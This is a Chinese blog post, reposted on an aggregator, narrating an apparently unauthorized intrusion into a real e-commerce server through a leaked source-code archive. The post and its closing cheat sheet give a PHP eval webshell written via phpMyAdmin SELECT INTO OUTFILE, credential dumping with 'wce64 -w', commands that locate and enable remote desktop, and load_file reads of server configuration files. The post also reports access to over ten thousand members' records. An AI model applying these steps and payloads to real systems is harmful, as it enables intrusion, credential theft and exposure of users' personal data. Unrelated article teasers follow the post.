源代码泄露获取某电子商务网站服务器权限

news/2024/5/20 22:12:35/文章来源:https://blog.csdn.net/weixin_44023460/article/details/84898742

源代码泄露获取某电子商务网站服务器权限
simeon
渗透本次目标事发偶然,通过shadon对“phpMyAdmin”关键字进行检索时,加入“index Of”关键字后,会出现所有存在列目录漏洞的网站,该网站为电子商务网站,网站保留有数万会员真实信息,下面将整过渗透过程进行分享。
1.发现目标
通过shadon搜索引擎对搜索记录逐个打开,发现某目标站点存在文件目录泄露漏洞:
http://203...227/
http://203...227/www.
.hk.rar
http://203.
.
.227/phpMyAdmin/
http://203.
..227/newshk/
目录还有phpinfo.php文件,看到phpMyAdmin和phpinfo.php同时存在,感觉服务器权限已经不远了,如图1所示,有网站源代码打包文件,将其下载到本地。
在这里插入图片描述
图1文件泄露
2.查看源代码打包文件
整个源代码压缩包2.37 GB,真大!通过搜索和查看,确定数据库配置文件为config.php
如图2所示,将其解压到本地,使用notepad进行查看,果然其中包含了数据库配置信息,而且还是root帐号,密码虽然算弱口令,但也是弱口令中的强口令。
在这里插入图片描述
图2寻找数据库配置文件
在这里插入图片描述
图3获取数据库root帐号和密码
3.寻找网站物理路径
通过phpinfo.php文件查看,在浏览器中可以使用Ctrl+F快捷键搜索关键字“SCRIPT_FILENAME”获取其真实物理路径地址,_SERVER[“SCRIPT_FILENAME”] D:/WWW/phpinfo.php,如图4所示。
在这里插入图片描述
图4获取网站物理路劲
4.Mysql直接导出Webshell
通过获取的root帐号和密码登录http://203.
.
.227/phpMyAdmin/,成功登录,如图5所示,选择SQL查询,在其中查询select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php’导出一句话后门。
在这里插入图片描述
图5登录mysql数据库
在这里插入图片描述
图6查询导出一句话后门
6.获取webshell
在浏览器中对http://203.
..227地址刷新即可获取一句话后门文件地址:http://203...227/p.php,在浏览器中打开进行访问,一切正常。使用中国菜刀一句话后门管理软件,shell添加并打开,如图7所示,顺利获取webshell
在这里插入图片描述
图7获取webshell
7.服务器提权
目测该系统php运行权限为系统权限,上传wce64.exe,然后在终端管理中输入“wce64 -w”命令成功获取管理员帐号密码,如图8所示。
在这里插入图片描述
图8获取管理员密码
8.获取3389端口
在终端管理器中执行netstat -an |find “3389”,无结果显示,估计管理员修改了默认端口,使用tasklist /svc命令获取进程名称和服务,找到termservice所对应的进程号,可以直接使用命令 tasklist /svc | find"termService"来获取对应的PID号,如图9所示,在本例中对应的ID号是1340。
在这里插入图片描述
图9获取远程终端服务对应的PID值
然后使用“netstat -ano”命令寻找1340对应的端口号,如图10所示,对应的TCP端口为7755端口,也可以使用命令netstat -ano | find '1340’命令直接显示。
在这里插入图片描述
图10获取终端服务对应的端口
9.登录远程终端
在命令提示符下输入mstsc.exe,打开远程终端登陆器,在3389远程桌面登录中的地址中输入“203.
..227:7755”,然后使用获取的管理员密码成功登录系统,如图11所示。
在这里插入图片描述
图11成功登录系统
10.域名反查
打开http://www.yougetsignal.com/tools/web-sites-on-web-server/网站对IP地址203.*..227进行域名反查,如图12所示,该IP下存在网站,打开该网站,该网站为一个电子商务网站,在该网站中存在数万会员资料,如图13所示。
在这里插入图片描述
图12域名反查
在这里插入图片描述
图13存在1万多条会员信息
11.渗透总结与思考
对存在phpMyAdmin的站点,通过代码泄露等方法来获取数据库的密码,然后通过读取文件或者导出文件来获取webshell。
(1)3389端口命令行下获取总结
netstat -an |find “3389” 查看3389端口是否开放
tasklist /svc | find “TermService” 获取对应TermService的PID号
netstat -ano | find ‘1340’ 查看上面获取的PID号对应的TCP端口号
(2)Windows 2008Server命令行开启3389
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =‘RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v
(3)wce64 -w 命令直接获取系统明文登录密码
(4)在phpinfo中查找SCRIPT_FILENAME关键字获取真实路径
(5)phpmyadmin一句话后门导出
select ‘<?php @eval($_POST[pass]);?>‘INTO OUTFILE ‘d:/www/p.php’
(6)phpstudy敏感配置文件
select load_file(’ D:\phpStudy\Lighttpd\conf\vhosts.conf ‘);
select load_file(’ D:\phpStudy\Lighttpd\conf\ lighttpd.conf ‘);
select load_file(’ D:\phpStudy\Apache\conf\vhosts.conf’);
select load_file(’ D:\phpStudy\Apache\conf\httpd.conf’);
select load_file(‘c:\boot.ini’);
select load_file(‘c:\boot.ini’);
select load_file(’ D:\phpStudy\MySQL\my.ini’);
更多攻防内容请欢迎访问本人在csdn上面创造的个人专栏:
《密码安全攻防技术精讲》:https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_823096.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

利用Mysql root帐号获取某Linux操作系统网站webshell

利用Mysql root帐号获取某Linux操作系统网站webshell simeon 获取Webshell&#xff0c;网上有很多文章&#xff0c;本文是phpMyAdmin漏洞利用与防范专题中的一个研究课题&#xff0c;其主要环境是在有Mysql数据库root帐号密码权限的基础下&#xff0c;如何通过技术手段获取Linu…

对某网站被挂黑广告源头分析

1.1对某网站被挂黑广告源头分析 任何的攻击都会留下痕迹,通过日志分析来发现漏洞,发现入侵的途径和路径,为漏洞分析和攻击溯源提供支持。在本案例中通过对日志文件的分析,成功获取后台地址,获取进入者的IP地址等信息。 1.1.1事件介绍 1.公司主站及其它站点被挂广告 某日晚…

对某入侵网站的一次快速处理

1.1对某入侵网站的一次快速处理 simeon 1.1.1入侵情况分析 凌晨1点,接到朋友的求助,网站被黑了,访问网站首页会自动定向到一个赌博网站,这个时间点都是该进入梦乡的时间,可是国家正在开会,这个时间点的事情都比较敏感,没有办法,直接开干吧。 1.查看首页代码 通过查看首…

4.公司网站被入侵——弱口令账号惹的祸

4.1公司网站被入侵——弱口令账号惹的祸 一些公司公司其内部网络跟web服务器直接相连,虽然在出口做了安全限制,仅仅允许80端口对外进行连接,但如果提供web服务的站点存在安全隐患,通过渗透,获取webshell,通过webshell提权,通过代理程序直接穿透内网,进而控制整个域控和…

网站服务器出现的链接错误,网站页面出现死链是哪些原因导致的?

网站死链大家都知道对于网站有较大的影响&#xff0c;一个站点存在着过多的死链是可能会导致网站降权&#xff0c;严重还会被K站&#xff0c;所以网站必须减少死链接情况出现。死链接是开始有效网站&#xff0c;过一段时间成为无效网站。到底哪些情况&#xff0c;导致死链接的出…

腾讯云服务器文件怎么恢复吗,实战腾讯云镜像备份恢复云服务器实例提取网站数据文件...

本来这个问题是准备今天操作的&#xff0c;但是担心今天要陪伴孩子出去玩&#xff0c;所以就在昨天晚上给客户搞定。这个网友的问题是服务器到期&#xff0c;然后找腾讯云客服备份镜像&#xff0c;但是他服务器已经到期删除&#xff0c;但是镜像好在还在的&#xff0c;所以我准…

python网站服务器面板,宝塔面板Python项目管理器部署flask

使用宝塔面板中的python项目管理器部署flask项目。最近想写一个工具箱的网站&#xff0c;之前使用的是PHP语言开发的&#xff0c;有一些功能是通过PHP无法实现的。在我的博客的第二个版本中就把开放平台功能模块关闭啦&#xff01;目前在使用flask框架在构建新的应用&#xff0…

PHP网站总是打印错误信息,PHP错误报告和错误信息设置详解_php

在php网站开发中&#xff0c;错误(Bugs)调试和解决是必不可少的部分&#xff0c;在网站调试阶段&#xff0c;错误信息能给我们很大帮助&#xff0c;当网站上线之后&#xff0c;我们是否也应该将原始的错误信息展示在用户面前呢&#xff1f;答案是否定的&#xff0c;为了提高用户…

Tomcat的下载及网站介绍初步测试

Tomcat下载地址 下载地址&#xff1a;https://tomcat.apache.org/ 下载完成后&#xff0c;解压压缩包&#xff1a; 文件夹信息 在bin目录下&#xff0c;startup.bat是运行tomcat、shutdown.bat是停止运行tomcat 测试tomcat 开启tomcat 双击startup.bat 会弹出&#xff1a…

怎么判断按摩店有服务_广州SEO外包服务推广哪里可以找到?怎么判断好不好?...

说到竞争压力大&#xff0c;网络营销一点都不会比线下轻&#xff0c;因为足不出户的消费习惯已成为了广大用户的习惯了。所以&#xff0c;随着移动互联网的迅速发展&#xff0c;企业需要使用有效的方法把自身的产品推广出去。而SEO推广是一种很不错的方法&#xff0c;因为它是一…

大规模网站架构的缓存机制和几何分形学

缓存机制在我们的实际研发工作中&#xff0c;被极其广泛地应用&#xff0c;通过这些缓存机制来提升系统交互的效率。简单的总结来说&#xff0c;就是在两个环节或者系统之间&#xff0c;会引入一个cache/buffer做为提升整体效率的角色。 而 有趣的是&#xff0c;这种缓存机制令…

分分钟在自己电脑上建一个视频网站,收费电影随便看,还没广告!

声明iker干货 本文仅作为技术文章&#xff0c;不鼓励不诱导用户观看盗版视频。第一步分分钟在自己电脑上建一个视频网站&#xff0c;收费电影随便看&#xff0c;还没广告&#xff01;第二步安装好软件后先切换环境&#xff0c;推荐使用 PHP 7.0.12 Apache&#xff0c;&#xf…

你需要但是找不到的网站,其实不太想分享,有你想要想收藏的

今天iker分享给大家几个平时十分需要的网站&#xff0c;如果对你有帮助麻烦点赞关注一下哦&#xff0c;谢谢了。1、Goimg.io这是一个图片压缩在线网站&#xff0c;当你在上传图片时可能会遇到图片文件太大的问题&#xff0c;这时这个网站就派上用场了。网站链接https://goimg.i…

6个在线制作海报的网站,一分钟搞定一张海报!

Fotojethttps://www.fotojet.com/cn/features/poster/FotoJet提供大量的富有设计感的海报模板&#xff0c;从音乐主题到时尚主题应有尽有。你可以选择喜欢的模板&#xff0c;再结合自己的想法&#xff0c;DIY完成你的海报。即使没有任何设计经验&#xff0c;你也可以设计出高水…

百度二级网页打不开_百度快照合理利用与网站网页制作的技巧

合理利用百度引擎进行网站宣传&#xff0c;这是网络时代企业网站发展的必要形式。目前百度搜索的排名&#xff0c;是宣传的核心与重点。而网站的整体布局&#xff0c;要追求有更好的宣传目的&#xff0c;就成为有效利用搜索引擎&#xff0c;提高网站流量的方法。当然让客户可能…

手机网站开发(WAP网站)第一篇

现在的互联网&#xff0c;可以说是名副其实的移动互联网。大家不仅可以利用无线网卡随处随地上网&#xff0c;还可以直接利用手机浏览网页、下载文件&#xff0c;而且现在的无线运营商也正在大力发展无线网络、扩展手机上网带宽。 于是&#xff0c;手机网页的制作需求也变多…

建材安装php源码,PHP响应式瓷砖大理石建材企业网站整站源码(自适应手机移动端) dedecms内核...

【温馨提示】源码包解压密码&#xff1a;www.youhutong.com资源描述PHP响应式瓷砖大理石建材企业网站整站源码(自适应手机移动端) dedecms内核源码介绍&#xff1a;采用织梦最新内核开发的模板&#xff0c;该模板企业通用、瓷砖、大理石、建材类企业都可使用。响应式自适应各种…

seo如何优化文章-知识交流_【SEO优化】网站SEO该如何优化

点击蓝字关注我哦当今的网络时代&#xff0c;酒香不怕巷子深的经营理念早已过时&#xff0c;SEO比任何时候都更重要。鉴于SEO对企业来说如此重要&#xff0c;那么具体该如何优化网站SEO呢&#xff1f;本文分别从关键词选择&#xff0c;原创文章&#xff0c;内页优化&#xff0c…

英文商城网站前端代码_门户网站关键词优化外包前端网站页面优化公司企业网站优化排名织梦网站优化霸屏商城网站推广优化现在网站seo推广优化google...

门户网站关键词优化外包前端网站页面优化公司企业网站优化排名织梦网站优化霸屏商城网站推广优化现在网站seo推广优化google门户网站关键词优化外包前端网站页面优化公司企业网站优化排名织梦网站优化霸屏商城网站推广优化现在网站seo推广优化google门户网站关键词优化外包前端…

爬取场库网站遇到的问题

采用解析网页源码的方式 然后通过xpath表达式去匹配视频的信息&#xff1a;标题、作者、图片的url、视频的url、评分、视频简介、点赞数、评论数、标签、类型。 我在匹配这些信息时遇到两大问题&#xff1a; 第一个问题&#xff1a;获取到网页源码之后&#xff0c;根本找不到…